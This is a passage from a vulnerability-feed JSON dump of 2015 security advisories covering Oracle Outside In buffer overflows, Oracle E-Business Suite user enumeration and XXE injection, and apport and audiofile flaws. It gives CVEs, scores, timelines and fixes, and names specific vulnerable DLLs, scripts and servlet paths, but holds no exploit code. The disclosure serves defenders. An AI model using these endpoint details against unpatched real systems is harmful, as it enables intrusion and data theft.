Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From 
remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they would check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers 
for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. 
Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification\r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. 
VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. 
It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. 
We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hardlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. 
VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. 
ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. 
ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}